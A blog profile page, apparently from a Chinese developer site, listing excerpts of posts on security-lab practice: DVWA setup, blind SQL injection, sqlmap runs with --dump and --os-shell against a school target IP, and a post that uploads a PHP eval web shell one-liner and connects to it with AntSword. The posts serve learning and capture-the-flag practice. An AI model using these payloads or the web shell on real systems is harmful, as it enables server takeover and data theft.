- 博客(11)
- 收藏
- 关注
RSS订阅原创 DOS命令学习
DOS命令一、简介DOS命令,是DOS操作系统的命令,是一种面向磁盘的操作命令,主要包括目录操作类命令、磁盘操作类命令、文件操作类命令和其它命令。DOS命令不区分大小写二、常用命令(一)、cd-改变当前目录1、功能:改变当前目录2、格式:cd [/D] [drive:] [path](1)、省略路径和子目录名显示当前命令(2)、CD\ 返回根目录(3)、cd … 退回上一级目录.\在路径的\后紧跟或者单独出现时:一个.表示当前目录;两个.表示上一级目录;在路径中的文件名中出
2021-03-22 19:40:14
295
原创 搭建dvwa环境和BlueLotus_XSSReceiver环境
前期准备下载phpstudy安装包安装好phpstudy下载地址安装教程一、安装dvwa平台下载地址将下载到的安装包放在我们前面安装的phpstudy下的www目录下并解压接下来打开PHP study打开apache和mysql(注意如果电脑里安装了其他的MySQL要提前关闭否则会冲突无法打开)配置DVWA的数据库,打开config文件夹,找到config.inc.php.dist,先备份再修改文件名为config.inc.php,打开它,修改db_password和db_user为r
2020-10-25 11:03:49
532
原创 安装docker搭建XSS容器
一、安装docker首先确保xshell连接CentOS(当然直接用虚拟机也可以)安装一些虚拟机下载命令sudo yum install -y yum-utils device-mapper-persistent-data lvm2添加软件源sudo yum-config-manager --add-repo https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo安装Docker-CEsudo yum makecac
2020-10-17 14:04:44
467
原创 sql盲注
盲注首先判断注入类型可以发现我们对url进行注入页面没有给我们什么有用的提示,那么我们可以判断这应该需要盲注一、布尔类型1、判断数据库长度id' or length(database())>7 --+id' or length(database())>8 --+可以发现数据库名大于7正确但是大于8错误那么应该是82、测试数据库名具体字符使用substr函数对数据库名进行获取(substr函数只能一个一个字符获取)并且使用ascii函数将获得的转换为数字进行比较id=0
2020-09-23 23:08:29
319
原创 sqlmap之--os-shell应用
一、找到网站注入点然后进入sqlmap进行攻击(学校靶机)sqlmap -u "http://117.167.136.244:28055/ajax.php?act=selgo" --data "tyid=1" -D faka -T ayangw_config --dump二、输入sqlmap.py -u "http://117.167.136.244:28060/ajax.php?act=selKm" --data "gid=1" --is-dba判断是否具有数据库管理员权限确定具有后进行下一步操作
2020-09-19 22:43:32
6488
原创 获取服务器目录
一、进入后台(靶机测试)通过sql注入得到的账号与密码进入后台二、上传文件1、找到后台内上传文件位置上传一个webshell.php文件其中包含<?php @eval($_POST['shell']);?>2、找到网站前台页面点击文件选择你所上传文件点击下载从下载页面获取文件网址三、通过蚁剑获取服务器目录1、打开蚁剑点击右键选择添加数据2、将获得的文件网址放进第一行密码填入shell3、点击保存双击网址即可进入服务器目录四、寻找flag进入根目录点击flag文件
2020-09-15 15:27:00
913
原创 sql注入实例
一、判断注入点(靶机示例)点击一篇文章寻找注入点注入点测试:确定可以注入二、使用sqlmap进行注入1、打开sqlmap输入sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -dbs得到库2、根据网页显示为软件学院我们选择rjxy进行库破解输入sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -D rjxy
2020-09-12 20:33:12
323
原创 宝塔搭建sqli-labs-master网站
一、开启Linux虚拟机输入"ip ddr"得到主机地址二、在cmd中获得宝塔面板账号方法:1 输入“ssh root@192.***.***132(上一步得到的主机地址)2 输入自己的密码3 输入bt开启宝塔面板4 输入14编号得到宝塔账号三、搭建网站...
2020-09-10 22:50:57
537
2
原创 sqlmap安装与使用
一、在网站上搜索sqlmap下载下载链接二、安装1 选择地方解压2 在桌面创建快捷方式(1)在其中输入cmd并命名(2)右击鼠标选择快捷方式属性(3)目标位置不变,起始位置改为sqlmap文件位置这样就完成快捷方式设置了。三、使用1 点击快捷方式进入2 输入sqlmap.py -u "http://127.0.0.1/Less-1/?id=1"测试并得到如id,数据库等信息2 进行注入输入sqlmap.py -u “http://127.0.0.1/Less-1/?id=1” --d
2020-09-10 15:34:24
263
原创 第一次搭建blog
第一次搭建博客1、什么是blog01 博客是日常学习的新知识02 方便之后求职0x01 blog的写法写标题使用# 一级标题用一个#后面空格再带标题二级标题用两个#后面带空格再带标题以此类推,几级标题就用几个#插图像使用!和[] 加()在中括号中填入对图像的描述,在()中填入图像地址或者可以直接复制图像插入链接使用[]和()在[]中填入标题,在()填入链接引用代码用反引号括起来一句就用一组反引号,代码块用三个反引号连着括起来例如...
2020-09-07 18:35:58
85
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人